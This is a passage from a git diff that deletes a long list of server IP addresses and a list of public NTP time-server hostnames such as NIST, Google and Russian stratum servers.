-109.239.62.52 -104.207.40.173 -218.28.141.74 -31.3.97.29 -103.100.210.68 -103.240.215.7 -112.82.223.38 -2a0a:7d80:1:7::91:2e -23.88.82.48 -31.28.163.229 -67.222.143.100 -61.72.38.100 -45.76.187.223 -185.47.228.94 -103.12.49.59 -223.223.188.218 -119.23.148.144 -109.236.89.108 -79.98.107.22 -178.32.157.89 -101.200.188.195 -23.224.115.207 -98.142.108.26 -216.224.172.73 -173.212.253.250 -173.212.205.188 -5.79.64.238 -39.107.103.77 -45.61.113.39 -153.126.176.84 -119.28.27.218 -5.79.103.242 -174.137.177.14 -91.224.140.171 -45.42.94.166 -103.198.45.17 -81.169.136.83 -58.16.86.153 -172.246.220.35 -85.31.196.224 -109.234.84.194 -54.210.75.133 -52.58.150.100 -67.229.72.66 -120.24.178.39 -164.70.8.178 -77.245.48.71 -176.31.36.200 -178.63.120.49 -107.155.95.205 -91.188.185.101 -108.163.175.101 -95.169.191.100 -13.250.221.240 -103.100.157.181 -114.112.82.95 -198.16.54.228 -2600:3c03::f03c:91ff:fee4:785a -120.24.157.148 -194.135.84.107 -121.40.107.158 -74.86.126.230 -154.119.36.5 -128.199.84.244 -114.215.155.13 -31.28.163.247 -139.196.182.210 -69.4.87.58 -149.202.111.153 -199.91.72.25 -160.16.84.152 -114.55.24.51 -185.14.58.89 -49.212.83.61 -43.230.202.83 -67.212.173.187 -120.26.89.172 -162.251.180.23 -51.254.156.61 -104.171.188.86 -67.225.210.133 -104.168.168.31 -58.20.59.57 -82.208.18.151 -112.74.198.30 -91.199.255.34 -74.120.12.17 -172.107.146.148 -107.181.94.2 -91.109.206.166 -109.73.168.202 -202.147.5.162 -188.166.90.143 -139.59.245.121 -45.114.124.79 -94.23.166.11 -43.230.200.113 -221.176.160.94 -173.193.3.195 -23.238.237.123 -180.97.70.205 -114.80.100.102 -150.95.179.143 -23.249.168.138 -114.67.156.4 -211.125.65.45 -50.22.159.171 -107.163.113.16 -45.76.69.181 -182.254.219.169 -77.109.150.105 -103.240.212.19 -91.121.46.232 -153.122.38.136 -120.26.120.120 -162.223.88.79 -217.61.129.205 -52.90.63.202 -5.178.109.113 -45.114.94.132 -106.2.1.171 -96.125.135.17 -50.115.131.94 -172.246.220.58 -92.53.100.46 -104.245.102.18 -153.126.188.110 -2a0a:7d80:1:7::101:15c -188.116.54.25 -47.94.57.219 -2a0a:7d80:1:7::95:2e9 -64.207.180.85 -91.102.162.78 -199.101.146.165 -18.221.238.134 -128.1.182.46 -206.190.141.192 -93.190.46.44 -142.4.103.68 -47.92.84.209 -178.33.67.50 -122.9.22.190 -103.214.170.63 -92.43.114.247 -114.215.199.100 -52.87.181.137 -2a0a:7d80:1:9::99:146 -104.207.50.76 -185.13.58.194 -37.187.249.38 -218.201.228.74 -103.233.8.239 -23.88.238.137 -142.4.107.246 -120.55.191.192 -103.53.198.239 -172.255.173.126 -103.37.112.44 -153.126.205.228 -85.95.238.199 -195.210.48.188 -123.207.248.84 -159.8.28.232 -128.199.166.246 -115.28.166.105 -213.47.210.59 -150.95.104.231 -34.229.52.35 -46.182.79.1 -66.209.177.178 -125.88.186.158 -95.67.11.93 -112.121.178.220 -92.43.113.75 -221.4.150.27 -104.236.254.155 -64.120.123.169 -54.173.99.91 -62.28.56.177 -54.207.56.216 -209.141.47.117 -107.164.66.13 -117.53.152.89 -94.176.235.164 -13.112.125.184 -103.193.240.57 -212.116.113.130 -210.189.86.23 -45.34.183.140 -175.41.22.122 -208.43.236.249 -172.246.196.6 -172.86.120.175 -218.93.208.46 -120.27.240.126 -115.71.241.115 -192.154.100.43 -103.3.68.147 -221.230.82.101 -69.30.221.98 -2605:6280:1:29::13 -142.91.95.63 -139.129.236.221 -104.224.200.245 -2605:6280:1:29::22 -51.255.222.11 -212.64.160.162 -23.104.135.229 -118.190.167.43 -123.206.133.48 -43.229.39.11 -63.142.252.150 -94.23.58.111 -198.148.116.102 -153.126.200.81 -67.228.218.209 -118.190.17.136 -61.189.189.109 -204.44.66.107 -103.12.211.222 -153.122.117.17 -103.240.212.194 -27.36.117.195 -93.190.143.18 -66.171.238.139 -128.199.227.186 -23.230.224.88 -162.243.79.77 -121.40.218.60 -45.117.83.9 -205.209.155.45 -115.29.248.151 -185.80.162.242 -185.66.175.63 -103.205.0.112 -5.199.133.110 -192.169.137.132 -211.157.179.206 -123.57.238.221 -91.205.16.174 -78.129.251.122 -23.110.56.103 -46.105.83.174 -173.0.63.174 -106.15.53.179 -109.236.84.235 -120.76.158.158 -49.212.158.39 -194.247.13.108 -111.13.49.3 -111.202.15.24 -122.9.18.187 -68.171.211.73 -23.19.238.36 -216.107.153.229 -162.251.180.18 -150.95.150.141 -82.135.148.37 -178.18.197.251 -178.208.76.13 -134.119.241.201 -104.203.82.164 -192.169.157.90 -80.241.221.223 -111.230.37.187 -47.52.3.69 -115.29.192.189 -104.232.75.141 -207.38.90.233 -80.241.217.121 -188.132.215.226 -149.210.147.30 -205.147.97.249 -95.183.12.71 -122.9.15.59 -91.142.222.168 -109.71.26.40 -43.230.202.48 -23.19.237.59 -23.230.224.146 -23.225.89.106 -122.155.1.254 -217.182.174.78 -23.104.135.127 -114.119.4.149 -103.246.115.5 -192.95.31.69 -23.110.61.101 -204.74.217.42 -27.254.151.26 -43.230.201.119 -107.164.66.44 -209.236.114.122 -194.58.122.249 -172.246.220.17 -37.247.104.30 -185.118.53.27 -209.126.124.236 -153.120.180.60 -153.120.164.237 -124.40.255.99 -198.37.114.94 -2a0a:7d80:1:7::92:23e -185.50.199.197 -5.178.109.81 -86.104.177.55 -146.185.174.62 -94.23.78.9 -50.28.36.121 -27.50.91.66 -123.57.44.216 -101.37.84.239 -92.38.229.149 -180.96.252.123 -164.39.34.83 -69.165.64.139 -216.224.117.194 -95.218.199.210 -201.31.246.196 -52.14.187.79 -43.230.200.104 -195.208.14.182 -2a0a:7d80:1:7::95:86 -103.55.13.187 -45.77.180.235 -212.204.202.113 -91.223.123.129 -1.34.145.229 -65.60.5.99 -139.224.209.150 -115.125.176.132 -185.104.28.68 -67.227.154.209 -216.201.83.194 -216.224.117.100 -2001:8d8:873:1300::c:efab -144.217.232.44 -123.57.164.19 -34.229.15.123 -154.16.241.80 -67.196.55.163 -114.67.224.124 -37.187.148.76 -67.228.218.245 -172.246.196.174 -95.211.71.42 -173.244.209.66 -60.191.134.35 -172.107.73.237 -115.29.44.11 -64.120.123.161 -212.204.202.116 -204.16.201.6 -91.221.99.144 -94.155.93.15 -5.45.77.115 -138.99.136.201 -23.247.10.166 -59.11.209.175 -103.37.112.242 -104.202.185.103 -118.89.65.243 -120.76.214.50 -64.118.87.197 -198.210.45.67 -64.22.68.228 -160.16.65.70 -112.78.1.197 -50.22.198.220 -176.124.246.13 -120.77.69.62 -153.126.194.79 -150.95.179.233 -123.206.60.179 -139.162.39.188 -47.88.106.56 -199.101.146.164 -178.208.35.27 -103.17.119.4 -210.59.244.135 -195.154.26.210 -109.199.111.143 -172.246.196.64 -141.138.195.227 -120.77.33.84 -23.230.19.229 -45.61.113.33 -123.56.8.129 -116.236.231.216 -172.255.173.30 -50.22.219.228 -177.125.27.100 -114.215.87.21 -174.142.158.150 -139.129.42.219 -209.164.80.142 -45.76.118.58 -74.82.185.198 -103.12.50.50 -68.178.130.167 -104.237.156.29 -156.67.217.111 -180.250.19.112 -42.121.112.16 -37.59.149.167 -51.254.98.209 -163.44.175.222 -185.50.197.211 -141.138.195.225 -104.232.102.139 -103.240.212.129 -172.246.196.81 -98.124.177.168 -185.44.107.112 -133.242.234.98 -103.55.13.160 -212.83.47.25 -202.51.231.83 -222.241.7.146 -107.186.35.138 -194.58.108.213 -212.68.50.247 -107.178.149.78 -23.225.95.115 -79.98.108.53 -107.187.41.203 -45.76.178.73 -123.54.195.205 -45.76.147.68 -104.148.75.197 -79.98.30.159 -112.124.127.81 -142.4.200.220 -162.218.53.242 -62.63.190.54 -116.231.249.60 -144.217.88.101 -47.52.19.26 -185.4.65.125 -94.176.237.111 -219.94.228.167 -109.169.76.31 -173.244.209.161 -151.80.216.76 -103.10.191.192 -182.92.101.75 -174.140.253.55 -156.237.178.136 -120.27.115.44 -103.205.0.66 -172.246.220.148 -153.126.138.25 -182.92.186.98 -82.221.105.205 -54.92.222.208 -183.131.70.146 -68.232.185.67 -5.178.109.199 -133.242.232.74 -31.193.180.207 -86.123.68.56 -5.135.58.91 -43.229.38.146 -50.19.49.210 -103.36.52.253 -182.92.99.72 -182.16.38.27 -107.163.113.114 -149.91.91.15 -62.76.103.242 -107.181.94.3 -108.163.175.98 -46.105.221.70 -123.60.202.204 -185.55.79.18 -212.48.87.33 -182.48.58.170 -168.235.95.167 -183.62.30.45 -72.3.197.228 -166.78.13.42 -112.124.6.214 -123.29.68.174 -115.159.160.211 -148.251.122.140 -103.100.157.226 -217.23.11.161 -81.169.237.233 -136.0.56.109 -64.235.47.122 -81.247.30.191 -194.24.160.2 -107.190.232.78 -119.147.115.24 -184.107.164.133 -50.116.29.66 -85.17.132.229 -194.19.246.48 -211.149.209.170 -121.41.9.83 -121.14.17.63 -62.210.214.183 -101.200.236.207 -123.207.216.149 -153.121.52.156 -210.193.3.196 -104.239.164.246 -46.254.20.56 -119.23.12.216 -109.73.168.211 -45.34.183.150 -45.119.82.212 -85.185.91.192 -119.29.32.33 -64.71.78.39 -67.227.211.52 -79.125.44.35 -221.112.96.168 -162.242.214.18 -23.230.224.175 -125.70.11.143 -62.63.190.62 -162.250.124.72 -66.175.212.245 -80.190.176.46 -119.254.147.82 -98.142.110.228 -103.240.213.77 -156.67.216.243 -171.12.139.47 -173.225.122.86 -198.46.146.141 -178.32.4.126 -116.62.235.168 -206.212.242.74 -23.19.22.47 -173.224.116.104 -62.109.5.177 -178.62.106.78 -49.212.133.120 -45.32.122.188 -80.233.244.76 -217.61.128.69 -124.160.150.98 -5.10.87.205 -80.68.148.100 -23.88.2.60 -115.28.24.177 -103.231.56.239 -43.230.201.141 -212.68.50.144 -62.152.56.21 -49.212.232.218 -87.106.60.208 -115.29.48.138 -156.235.169.24 -217.182.38.124 -67.222.5.201 -37.187.95.160 -204.152.217.219 -104.202.185.172 -93.115.240.147 -103.14.20.30 -51.15.222.192 -103.3.173.155 -103.66.104.16 -182.163.126.242 -54.37.170.65 -107.163.113.81 -122.9.163.194 -2a0a:7d80:1:7::92:112 -172.255.173.41 -103.240.212.241 -123.57.53.13 -157.7.171.17 -59.108.232.206 -142.44.226.202 -49.51.36.37 -91.121.181.74 -91.224.141.163 -101.132.106.72 -141.138.195.189 -109.206.187.6 -183.92.215.116 -155.254.18.245 -109.74.15.174 -92.63.111.57 -96.45.180.3 -45.61.114.36 -2605:6280:1:d::8 -76.72.168.166 -23.225.95.53 -51.254.5.212 -62.75.244.176 -178.57.217.155 -104.202.185.121 -87.118.121.103 -83.223.106.200 -128.199.197.230 -2a01:4f8:141:1241::2 -101.200.202.55 -45.34.183.145 -80.233.244.89 -149.154.70.101 -91.195.200.148 -188.132.147.23 -23.252.168.56 -103.10.191.189 -153.125.234.25 -128.127.106.7 -219.94.238.207 -156.235.171.149 -208.51.63.218 -188.95.253.57 -158.69.131.210 -31.28.163.207 -188.164.193.116 -43.230.200.237 -85.25.154.98 -47.89.39.26 -172.255.173.246 -27.223.11.42 -156.237.177.165 -163.49.89.61 -202.114.130.20 -185.200.229.3 -120.24.87.88 -149.62.173.25 -136.0.69.201 -123.206.53.52 -149.56.23.181 -51.254.4.189 -91.221.61.244 -120.209.132.99 -142.91.95.66 -120.92.236.170 -54.194.255.185 -136.179.4.214 -123.56.177.118 -59.151.12.78 -176.31.16.35 -54.80.234.149 -157.52.240.89 -23.225.239.192 -210.211.101.209 -23.238.237.106 -176.31.12.235 -216.107.153.220 -47.92.93.43 -185.36.100.70 -23.244.241.155 -120.27.196.196 -107.163.113.215 -148.251.195.132 -95.213.244.100 -94.23.113.150 -176.31.129.162 -96.73.66.75 -185.43.221.191 -121.54.161.105 -156.235.169.188 -109.68.46.5 -121.42.145.195 -172.246.220.63 -142.4.201.238 -121.42.144.214 -219.94.240.240 -138.197.26.24 -120.25.196.119 -203.13.40.14 -43.230.202.239 -104.203.82.201 -185.122.140.6 -174.137.161.121 -136.0.69.228 -160.16.118.118 -85.17.237.38 -23.230.19.164 -5.45.77.164 -5.77.57.24 -202.43.163.38 -118.144.74.28 -133.130.113.84 -104.232.75.145 -23.19.238.21 -217.160.182.218 -67.225.242.15 -43.230.200.61 -37.59.213.66 -95.130.170.238 -31.220.54.75 -115.146.121.220 -202.6.17.184 -207.210.124.182 -217.61.128.92 -147.255.39.86 -5.189.148.165 -43.230.200.49 -185.122.140.79 -142.91.239.106 -103.28.38.156 -103.240.212.53 -185.104.152.178 -45.76.98.117 -54.175.55.66 -116.62.23.109 -121.11.76.99 -45.76.35.25 -58.64.207.214 -23.235.234.102 -192.81.219.116 -113.39.105.211 -123.57.134.121 -185.14.58.51 -182.16.57.74 -23.225.239.159 -143.255.248.136 -67.225.130.157 -158.69.176.207 -141.138.195.252 -31.28.163.196 -178.32.52.87 -192.169.200.79 -120.25.222.195 -77.123.139.72 -122.9.18.142 -93.188.163.206 -49.212.234.26 -185.122.140.85 -172.246.220.139 -194.117.237.74 -202.171.225.109 -81.186.34.157 -31.184.236.20 -178.170.217.45 -113.36.238.117 -46.166.130.189 -159.203.119.190 -60.188.235.6 -194.58.118.111 -115.125.176.246 -47.93.115.167 -103.229.183.182 -27.254.146.108 -92.43.117.197 -59.52.184.215 -5.135.58.112 -66.70.234.247 -150.95.142.91 -45.76.180.15 -88.214.242.115 -124.248.207.169 -162.13.177.15 -193.124.17.145 -37.59.76.210 -124.243.223.22 -52.221.97.120 -47.100.191.130 -97.107.142.166 -2a0a:7d80:1:7::97:2e1 -104.199.186.167 -23.238.237.66 -89.46.88.200 -175.122.253.10 -5.149.252.50 -202.169.35.53 -2600:3c00::f03c:91ff:fedb:ddf4 -101.251.224.66 -115.29.189.195 -217.11.249.131 -64.22.68.66 -98.131.251.4 -139.162.196.220 -142.4.107.105 -104.149.66.158 -104.151.236.250 -93.49.170.196 -69.30.210.149 -221.193.192.61 -37.59.133.143 -174.137.164.134 -23.224.115.137 -46.253.95.134 -5.39.124.69 -139.196.49.145 -159.203.181.152 -122.9.163.228 -69.164.214.54 -112.124.25.45 -139.224.33.178 -175.122.253.6 -61.156.219.15 -156.235.171.54 -103.12.50.14 -104.149.66.143 -216.155.139.215 -107.164.66.111 -120.27.236.178 -79.98.30.26 -148.251.111.126 -115.125.176.160 -216.224.117.208 -174.138.57.131 -142.4.113.195 -103.195.31.229 -188.165.5.157 -160.16.90.142 -173.209.60.4 -112.74.61.207 -5.83.45.101 -185.106.208.93 -120.77.62.113 -5.178.109.135 -185.149.101.8 -52.193.101.248 -207.244.97.115 -120.76.206.196 -157.119.233.129 -107.180.71.107 -103.240.213.229 -69.10.43.42 -75.126.8.79 -67.227.223.143 -60.205.151.162 -194.39.84.14 -217.112.131.168 -103.74.118.64 -178.33.41.69 -43.230.200.77 -176.31.90.38 -119.29.234.224 -66.90.111.82 -54.227.202.180 -2600:3c03::f03c:91ff:fe69:b905 -69.175.60.44 -142.91.239.104 -2600:3c03::f03c:91ff:fe6e:f860 -162.250.124.67 -2a01:7e00::f03c:91ff:fedb:1b68 -5.79.76.242 -104.203.82.85 -178.33.50.20 -64.185.234.174 -122.9.163.225 -2001:470:b:20e::3 -107.170.81.63 -2a01:4f8:121:50a2::2 -66.171.239.193 -117.28.159.73 -104.245.102.109 -142.44.176.45 -120.77.50.187 -198.50.243.241 -164.70.8.74 -174.137.166.93 -134.119.106.73 -150.95.157.162 -185.86.210.228 -118.88.19.158 -163.44.192.172 -23.230.19.3 -27.254.146.9 -85.95.228.152 -173.212.203.178 -92.240.237.108 -47.90.121.28 -134.119.94.1 -43.230.201.145 -99.192.222.69 -121.94.173.137 -119.9.116.193 -153.120.7.18 -2605:ea00:1:1:1:1:494:fed6 -174.139.7.14 -54.164.133.35 -216.224.117.184 -41.208.68.104 -101.200.185.21 -103.41.125.24 -200.194.207.235 -118.178.252.164 -95.211.81.221 -122.9.235.238 -23.230.19.243 -18.231.33.0 -45.63.36.133 -104.203.82.154 -186.233.190.147 -103.250.94.231 -54.91.83.209 -37.230.103.141 -142.91.95.14 -172.255.173.98 -64.71.78.40 -2400:8901::f03c:91ff:fedb:d5f6 -188.93.10.70 -115.29.187.60 -5.135.68.203 -207.58.186.56 -121.42.32.106 -139.59.106.100 -184.170.141.121 -23.224.115.203 -52.90.172.100 -5.45.77.160 -107.187.41.43 -121.40.21.179 -43.230.202.35 -123.57.204.27 -2a01:7e00::f03c:91ff:fe37:152c -93.190.143.213 -45.56.66.84 -142.4.107.99 -141.0.19.136 -192.157.212.194 -121.42.181.108 -64.6.107.105 -173.193.149.109 -23.225.89.252 -23.225.113.59 -186.251.16.10 -45.41.92.141 -79.137.114.140 -198.24.143.236 -67.55.93.26 -185.50.196.248 -69.30.221.101 -2600:3c01::f03c:91ff:fe33:1f13 -67.159.39.35 -42.62.5.10 -103.240.213.43 -104.222.96.41 -210.71.198.143 -2a0a:7d80:1:7::101:256 -217.23.158.189 -109.237.219.204 -187.28.83.55 -222.124.213.79 -50.116.2.105 -103.221.221.181 -119.42.149.20 -43.230.203.143 -5.56.56.44 -114.215.179.127 -211.159.161.94 -72.52.164.6 -116.255.155.206 -142.91.95.137 -104.245.102.42 -66.55.141.35 -163.172.31.101 -23.224.115.246 -211.110.140.228 -134.213.60.156 -2a01:7e00::f03c:91ff:fe37:ea9a -118.184.176.53 -115.29.96.186 -144.168.124.10 -195.248.235.135 -43.230.200.123 -183.61.9.32 -23.225.95.102 -185.57.10.156 -164.132.167.184 -107.180.85.192 -104.207.50.100 -185.191.228.250 -192.34.26.33 -104.223.109.134 -50.97.228.28 -103.240.213.224 -173.236.115.98 -23.225.239.75 -142.44.189.161 -144.168.71.136 -5.39.93.147 -185.13.58.147 -173.252.197.116 -216.224.117.162 -121.83.250.8 -104.131.12.58 -172.255.173.115 -54.64.238.198 -104.148.100.104 -2406:da00:ff00::1717:7b27 -115.125.176.167 -123.60.202.200 -74.206.240.118 -5.22.153.3 -23.88.82.55 -45.33.71.18 -118.89.30.235 -107.163.113.169 -2a01:4f8:202:34e7::2 -51.255.207.155 -52.49.239.72 -49.212.217.51 -216.224.117.209 -60.12.69.122 -174.137.164.188 -122.155.210.59 -120.27.54.130 -222.172.150.132 -121.42.148.182 -119.42.150.211 -174.137.175.85 -221.143.48.188 -178.32.190.43 -163.172.58.221 -124.192.148.49 -69.90.8.156 -173.203.216.96 -195.69.187.240 -172.246.196.105 -98.124.176.176 -103.240.215.62 -124.172.139.138 -200.29.32.196 -113.106.10.97 -67.229.72.117 -122.99.118.164 -5.178.109.118 -2a01:7e00::f03c:91ff:fe37:8b3e -47.93.124.159 -91.103.7.126 -45.33.94.39 -122.9.235.228 -81.93.247.197 -193.36.35.93 -117.121.10.70 -66.254.184.136 -108.170.59.202 -178.33.109.55 -45.34.183.136 -220.165.79.30 -136.0.69.98 -122.114.42.78 -199.116.252.201 -128.199.68.73 -51.254.128.108 -166.62.74.198 -87.98.138.128 -94.23.158.17 -120.77.104.75 -94.23.116.126 -23.19.195.250 -37.230.99.50 -103.240.214.74 -96.8.126.254 -174.137.161.95 -85.118.114.116 -184.172.108.207 -208.80.11.179 -50.62.176.124 -66.96.238.227 -103.205.2.82 -172.107.71.7 -2a0a:7d80:1:7::95:30e -66.76.35.60 -120.194.166.98 -160.16.118.61 -2a0a:7d80:1:9::99:153 -172.246.220.88 -91.222.160.180 -74.206.233.149 -120.25.67.72 -62.63.191.45 -212.68.42.84 -137.74.17.68 -156.237.176.200 -107.178.162.109 -46.101.115.223 -219.149.183.99 -178.62.72.115 -119.23.209.218 -103.7.57.38 -107.178.147.91 -2600:3c01::f03c:91ff:feae:7c38 -111.194.115.220 -172.255.173.132 -82.135.148.233 -43.249.8.47 -2a01:7e00::f03c:91ff:fedf:22bb -5.196.187.248 -174.137.175.94 -103.35.151.66 -23.19.237.46 -173.212.230.91 -5.153.18.171 -128.199.246.20 -115.125.176.188 -206.212.241.74 -115.125.176.148 -109.169.76.32 -121.43.150.93 -74.206.240.45 -172.107.64.18 -173.199.116.23 -47.95.253.211 -5.77.57.25 -115.126.53.53 -156.237.177.184 -122.183.102.126 -114.215.69.26 -79.98.108.52 -2001:4800:7818:101:63af:5da6:710d:c33d -82.135.148.217 -64.237.59.201 -94.230.210.70 -89.207.88.152 -5.255.93.225 -122.114.32.65 -89.207.144.44 -121.40.102.199 -222.158.209.235 -196.196.25.91 -151.80.171.147 -198.200.41.60 -81.0.226.96 -188.165.119.234 -133.242.176.187 -93.190.41.100 -79.98.107.202 -112.74.173.89 -138.197.78.211 -121.42.249.84 -185.48.237.34 -43.230.200.188 -49.156.55.4 -82.77.13.10 -212.68.61.91 -185.168.8.185 -79.98.108.168 -43.230.201.51 -84.124.24.4 -45.32.95.152 -173.249.33.97 -162.243.147.123 -185.63.188.12 -45.42.94.161 -85.214.47.65 -139.59.115.146 -156.67.216.116 -188.93.128.210 -144.217.96.88 -45.42.94.158 -68.171.211.113 -115.125.176.182 -182.16.172.195 -198.58.123.92 -61.31.224.166 -172.107.147.55 -146.185.149.80 -111.230.233.152 -101.200.199.236 -217.61.130.136 -2400:8901::f03c:91ff:fee4:f7ab -103.205.3.70 -176.31.129.170 -31.169.92.98 -83.150.67.17 -103.35.202.53 -174.137.161.120 -34.224.11.199 -31.28.163.219 -121.199.23.29 -158.69.104.217 -220.181.86.20 -47.92.170.114 -185.9.38.5 -121.40.195.43 -2607:fc50:1:d200:216:3eff:fe34:8de7 -173.236.111.170 -45.42.94.183 -43.241.238.241 -139.129.53.185 -213.238.161.76 -115.125.176.238 -5.135.58.82 -47.96.36.30 -172.246.220.116 -172.246.128.158 -172.246.128.157 -61.183.65.172 -2605:6280:1:29::2 -103.100.157.91 -147.32.102.75 -195.189.210.111 -182.16.172.214 -120.26.105.51 -23.110.47.194 -212.86.52.212 -142.91.243.113 -211.157.130.11 -45.125.236.163 -162.247.97.184 -47.88.17.231 -5.196.11.20 -206.214.220.70 -2a0a:7d80:1:7::91:14 -47.104.98.200 -13.126.93.247 -103.240.212.219 -95.85.21.117 -212.111.43.73 -51.254.247.198 -149.56.101.21 -115.29.12.202 -134.119.155.136 -103.248.254.54 -2a01:7e00::f03c:91ff:fe50:ad31 -37.59.213.93 -23.225.95.116 -104.237.138.199 -103.10.190.254 -103.240.215.153 -59.72.128.94 -122.10.70.133 -5.199.172.180 -153.122.26.43 -115.28.90.130 -188.93.232.16 -23.95.28.234 -142.91.241.118 -120.25.99.122 -190.116.175.6 -77.75.124.170 -43.241.56.90 -120.27.10.212 -23.238.237.102 -37.34.49.58 -211.149.227.218 -50.22.208.179 -172.246.220.204 -2001:978:9200:0:20:: -150.95.137.232 -121.232.205.123 -5.145.175.67 -151.9.134.119 -173.236.115.203 -187.86.15.3 -120.76.45.95 -218.92.215.110 -23.234.26.42 -119.23.16.1 -172.245.126.236 -120.76.5.169 -104.128.226.153 -23.104.135.92 -182.92.83.191 -104.200.18.186 -66.34.235.63 -107.187.41.91 -163.44.207.28 -166.78.149.76 -2a01:4f8:201:4186::2 -203.57.78.25 -23.225.113.62 -103.240.213.149 -188.165.32.246 -171.34.69.237 -2600:3c03::f03c:91ff:fe56:3c0e -37.59.213.69 -2a01:7e00::f03c:91ff:fe50:414d -2a0a:7d80:1:7::102:89 -193.41.247.77 -125.126.244.72 -164.132.16.188 -192.99.14.73 -172.246.220.43 -163.49.81.6 -123.57.241.207 -114.215.110.8 -23.229.84.110 -2a01:7e00::f03c:91ff:fe50:4d5e -2600:3c00::f03c:91ff:fe33:f3e -103.12.152.220 -60.205.169.103 -23.250.115.120 -2600:3c00::f03c:91ff:fe98:ff21 -67.222.143.30 -23.225.95.166 -107.178.149.119 -67.198.134.163 -188.226.193.210 -190.85.176.2 -122.9.15.26 -98.126.158.151 -103.240.213.108 -166.78.223.88 -104.207.44.88 -122.144.13.7 -185.66.140.178 -27.118.28.66 -173.199.158.110 -2001:978:9200:0:147:: -114.55.231.234 -121.201.21.216 -2600:3c02::f03c:91ff:fe69:5a70 -50.116.24.162 -23.225.89.223 -182.48.55.94 -50.115.116.234 -47.92.29.116 -189.85.28.186 -173.193.39.241 -182.92.212.96 -91.215.153.111 -51.255.62.111 -77.109.150.104 -185.149.101.93 -103.240.214.154 -194.145.208.114 -107.170.249.108 -54.186.190.82 -103.193.242.98 -54.236.223.190 -185.43.206.77 -104.149.66.132 -47.92.71.146 -45.123.147.31 -211.125.65.244 -185.91.109.192 -37.187.196.35 -103.248.253.87 -210.59.230.67 -2001:4801:7824:101:be76:4eff:fe10:113 -115.231.24.94 -188.226.169.220 -64.22.68.54 -14.0.74.138 -43.230.143.160 -139.59.127.102 -153.120.33.63 -219.141.209.197 -172.107.147.54 -120.25.192.51 -172.106.186.7 -66.34.170.4 -43.230.201.207 -68.171.211.95 -133.130.122.173 -5.135.118.241 -2a01:4f8:201:2228::2 -136.0.69.104 -62.109.19.125 -210.245.125.32 -43.230.203.176 -66.211.106.27 -130.15.161.45 -172.246.196.126 -111.67.198.93 -103.3.173.135 -209.133.222.190 -185.89.204.5 -84.232.5.62 -60.253.103.183 -142.91.232.73 -60.249.211.100 -125.88.254.175 -117.54.120.252 -106.15.44.232 -190.85.8.85 -199.180.101.75 -109.169.59.124 -14.119.110.204 -218.76.162.9 -104.202.185.66 -94.23.99.194 -142.91.241.106 -74.82.168.34 -47.91.79.42 -197.242.155.175 -193.234.225.232 -120.24.248.68 -43.230.202.218 -103.100.157.31 -43.230.200.236 -107.190.235.69 -103.12.49.48 -123.58.57.172 -120.26.224.57 -82.146.57.216 -67.229.73.73 -120.26.199.236 -93.93.70.242 -67.207.91.193 -194.145.208.165 -220.181.86.36 -103.193.172.200 -173.252.208.0 -13.231.46.58 -2a01:4f8:b0:4569::2 -2a0a:7d80:1:7::93:1e5 -138.68.121.22 -122.9.235.210 -23.225.95.118 -182.48.80.45 -192.3.217.188 -176.31.36.209 -185.36.64.64 -208.99.81.195 -159.148.20.116 -120.25.154.200 -139.224.70.229 -188.120.229.14 -23.104.135.39 -145.239.141.75 -5.178.109.94 -2400:8901::f03c:91ff:fe26:9fab -125.17.173.5 -45.79.100.18 -2a01:7e00::f03c:91ff:fe50:612a -202.9.100.160 -2600:3c00::f03c:91ff:fedb:df2f -23.19.238.46 -173.192.25.32 -167.114.216.143 -2002:5bd2:e436::1 -185.91.108.71 -192.241.221.149 -119.81.89.143 -49.212.113.76 -134.119.160.242 -192.162.24.37 -118.24.40.162 -103.92.24.11 -72.10.55.187 -46.105.114.203 -65.175.104.220 -5.178.109.146 -202.65.215.206 -198.154.233.125 -182.156.197.126 -142.91.95.212 -173.236.78.86 -117.27.152.9 -122.9.18.168 -216.224.117.235 -101.201.115.120 -193.169.188.53 -148.251.22.183 -89.44.32.31 -45.32.232.164 -107.165.201.32 -115.68.48.35 -39.109.126.222 -103.240.212.24 -59.110.220.68 -121.43.235.157 -112.74.13.13 -47.90.17.130 -114.207.112.9 -146.71.99.176 -142.91.232.67 -2600:3c00::f03c:91ff:fe33:730d -185.104.152.142 -27.214.143.50 -67.17.206.202 -160.16.112.216 -118.123.22.233 -121.42.153.37 -2600:3c00::f03c:91ff:fedb:a3eb -110.170.79.144 -45.252.248.221 -172.104.146.184 -111.75.216.211 -46.105.189.255 -23.238.237.89 -211.76.138.243 -2a0a:7d80:1:7::101:269 -2600:3c00::f03c:91ff:fe73:fd8f -2a01:440:1:21::2 -78.155.219.48 -2600:3c00::f03c:91ff:fedb:34ef -103.100.157.34 -103.31.233.186 -23.244.241.58 -5.135.228.124 -2600:3c02::f03c:91ff:fe89:d95d -160.16.108.94 -210.65.151.151 -115.125.176.168 -2600:3c01::f03c:91ff:fe70:9a8e -177.93.110.14 -74.206.240.6 -209.222.20.156 -103.240.213.18 -220.181.86.34 -139.162.254.218 -208.167.237.232 -115.125.176.61 -172.252.10.191 -103.3.173.172 -77.46.152.38 -2600:3c03::f03c:91ff:fedf:965e -172.104.96.85 -104.202.185.156 -120.27.197.195 -196.1.58.170 \ No newline at end of file diff --git a/files/ntp_servers.txt b/files/ntp_servers.txt deleted file mode 100644 index 40a725c..0000000 --- a/files/ntp_servers.txt +++ /dev/null @@ -1,236 +0,0 @@ -time.google.com -time1.google.com -time2.google.com -time3.google.com -time4.google.com -time.cloudflare.com -time.windows.com -time.apple.com -time.euro.apple.com -clepsydra.dec.com/clepsydra.labs.hp.com/clepsydra.hpl.hp.com -time-a-g.nist.gov -time-b-g.nist.gov -time-c-g.nist.gov -time-d-g.nist.gov -time-a-wwv.nist.gov -time-b-wwv.nist.gov -time-c-wwv.nist.gov -time-d-wwv.nist.gov -time-a-b.nist.gov -time-b-b.nist.gov -time-c-b.nist.gov -time-d-b.nist.gov -time.nist.gov -utcnist.colorado.edu -utcnist2.colorado.edu -ntp1.vniiftri.ru -ntp2.vniiftri.ru -ntp3.vniiftri.ru -ntp4.vniiftri.ru -ntp1.niiftri.irkutsk.ru -ntp2.niiftri.irkutsk.ru -vniiftri.khv.ru -vniiftri2.khv.ru -ntp21.vniiftri.ru -ntp.mobatime.ru -ntp1.stratum1.ru -ntp2.stratum1.ru -ntp3.stratum1.ru -ntp4.stratum1.ru -ntp5.stratum1.ru -ntp2.stratum2.ru -ntp3.stratum2.ru -ntp4.stratum2.ru -ntp5.stratum2.ru -stratum1.net -ntp.ru -ts1.aco.net -ts2.aco.net -ntp1.net.berkeley.edu -ntp2.net.berkeley.edu -ntp.gsu.edu -tick.usask.ca -tock.usask.ca -ntp.nsu.ru 